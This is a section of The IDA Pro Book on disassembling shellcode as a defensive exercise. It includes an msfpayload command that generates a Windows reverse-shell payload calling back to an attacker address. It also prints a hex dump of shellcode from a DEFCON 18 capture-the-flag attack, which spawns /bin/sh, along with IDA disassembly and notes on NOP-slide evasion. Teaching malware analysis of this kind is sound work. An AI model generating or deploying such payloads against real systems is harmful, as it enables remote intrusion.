Analyzing Shellcode

Up to this point, this chapter has focused on the use of IDA as an offensive tool. Before we conclude, it might be nice to offer up at least one use for IDA as a defensive tool. As with any other binary code, there is only one way to determine what shellcode does, and that is to disassemble it. Of course, the first requirement is to get your hands on some shellcode. If you are the curious type and have always wondered how Metasploit payloads work, you might simply use Metasploit to generate a payload in raw form and then disassemble the resulting blob.

The following Metasploit command generates a payload that calls back to port 4444 on the attacker’s computer and grants the attacker a shell on the target Windows computer:

# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.15.20 R >
w32_reverse_4444

The resulting file contains the requested payload in its raw binary form. The file can be opened in IDA (in binary form since it has no specific format) and a disassembly obtained by converting the displayed bytes into code.

Another place that shellcode can turn up is in network packet captures. Narrowing down exactly which packets contain shellcode can be a challenge, and you are invited to check out any of the vast number of books on network security that will be happy to tell you just how to find all those nasty packets. For now consider the reassembled client stream of an attack observed on the Capture the Flag network at DEFCON 18:

00000000   AD 02 0E 08  01 00 00 00  47 43 4E 93  43 4B 91 90  ........GCN.CK..
00000010   92 47 4E 46  96 46 41 4A  43 4F 99 41  40 49 48 43  .GNF.FAJCO.A@IHC
00000020   4A 4E 4B 43  42 49 93 4B  4A 41 47 46  46 46 43 90  JNKCBI.KJAGFFFC.
00000030   4E 46 97 4A  43 90 42 91  46 90 4E 97  42 48 41 48  NF.JC.B.F.N.BHAH
00000040   97 93 48 97  93 42 40 4B  99 4A 6A 02  58 CD 80 09  ..H..B@K.Jj.X...
00000050   D2 75 06 6A  01 58 50 CD  80 33 C0 B4  10 2B E0 31  .u.j.XP..3...+.1
00000060   D2 52 89 E6  52 52 B2 80  52 B2 04 52  56 52 52 66  .R..RR..R..RVRRf
00000070   FF 46 E8 6A  1D 58 CD 80  81 3E 48 41  43 4B 75 EF  .F.j.X...>HACKu.
00000080   5A 5F 6A 02  59 6A 5A 58  99 51 57 51  CD 80 49 79  Z_j.YjZX.QWQ..Iy
00000090   F4 52 68 2F  2F 73 68 68  2F 62 69 6E  89 E3 50 54  .Rh//shh/bin..PT
000000A0   53 53 B0 3B  CD 80 41 41  49 47 41 93  97 97 4B 48  SS.;..AAIGA...KH

This dump clearly contains a mix of ASCII and binary data, and based on other data associated with this particular network connection, the binary data is assumed to be shellcode. Packet-analysis tools such as Wireshark^[199] often possess the capability to extract TCP session content directly to a file. In the case of Wireshark, once you find a TCP session of interest, you can use the Follow TCP Stream command and then save the raw stream content to a file. The resulting file can then be loaded into IDA (using IDA’s binary loader) and analyzed further. Often network attack sessions contain a mix of shellcode and application layer content. In order to properly disassemble the shellcode, you must correctly locate the first bytes of the attacker’s payload. The level of difficulty in doing this will vary from one attack to the next and one protocol to the next. In some cases, long NOP slides will be obvious (long sequences of 0x90 for x86 attacks), while in other cases (such as the current example), locating the NOPs, and therefore the shellcode, may be less obvious. The preceding hex dump, for example, actually contains a NOP slide; however, instead of actual x86 NOPs, a randomly generated sequence of 1-byte instructions that have no effect on the shell code to follow is used. Since an infinite number of permutations exist for such a NOP slide, the danger that a network intrusion detection system will recognize and alert on the NOP slide is diminished. Finally, some knowledge of the application that is being attacked may help in distinguishing data elements meant for consumption by the application from shellcode meant to be executed. In this case, with a little effort, IDA disassembles the preceding binary content as shown here:

  seg000:00000000           db 0ADh ; ¡
   seg000:00000001           db    2
   seg000:00000002           db  0Eh
   seg000:00000003           db    8
   seg000:00000004           db    1
   seg000:00000005           db    0
   seg000:00000006           db    0
   seg000:00000007           db    0
   seg000:00000008 ; --------------------------------------------------------------
   seg000:00000008           inc     edi
   seg000:00000009           inc     ebx
   seg000:0000000A           dec     esi
   ...             ; NOP slide and shellcode initialization omitted
   seg000:0000006D           push    edx
   seg000:0000006E           push    edx
   seg000:0000006F
   seg000:0000006F loc_6F:                   ; CODE XREF:  seg000:0000007E↓j
   seg000:0000006F           inc     word ptr [esi-18h]
   seg000:00000073           push    1Dh
   seg000:00000075           pop     eax
  seg000:00000076           int     80h     ; LINUX - sys_pause
   seg000:00000078           cmp     dword ptr [esi], 4B434148h
   seg000:0000007E           jnz     short loc_6F
   seg000:00000080           pop     edx
   seg000:00000081           pop     edi
   seg000:00000082           push    2
   seg000:00000084           pop     ecx
   seg000:00000085
   seg000:00000085 loc_85:                   ; CODE XREF:  seg000:0000008F↓j
   seg000:00000085           push    5Ah ; 'Z'
   seg000:00000087           pop     eax
   seg000:00000088           cdq
   seg000:00000089           push    ecx
   seg000:0000008A           push    edi
   seg000:0000008B           push    ecx
  seg000:0000008C           int     80h     ; LINUX - old_mmap
   seg000:0000008E           dec     ecx
   seg000:0000008F           jns     short loc_85
   seg000:00000091           push    edx
   seg000:00000092           push    'hs//'
   seg000:00000097           push    'nib/'
   ...             ; continues to invoke execve to spawn the shell

One point worth noting is that the first 8 bytes of the stream are actually protocol data, not shellcode, and thus we have chosen not to disassemble them. Also, IDA seems to have misidentified the system calls that are being made at and . We have omitted the fact that this exploit was targeting a FreeBSD application, which would be helpful in decoding the system call numbers being used in the payload. Because IDA is only capable of annotating Linux system call numbers, we are left to do a little research to learn that FreeBSD system call 29 (1dh) is actually recvfrom (rather than pause) and system call 90 (5Ah) is actually the dup2 function (rather than old_mmap).

Because it lacks any header information useful to IDA, shellcode will generally require extra attention in order to be properly disassembled. In addition, shellcode encoders are frequently employed as a means of evading intrusion detection systems. Such encoders have an effect very much like the effect that obfuscation tools have on standard binaries, further complicating the shellcode-disassembly process.

^[199]See http://www.wireshark.org/.

Previous Chapter

IDA and the Exploit-Development Process

Next Chapter

Summary

Table of Contents for The IDA Pro Book, 2nd Edition

Analyzing Shellcode

Table of Contents for
The IDA Pro Book, 2nd Edition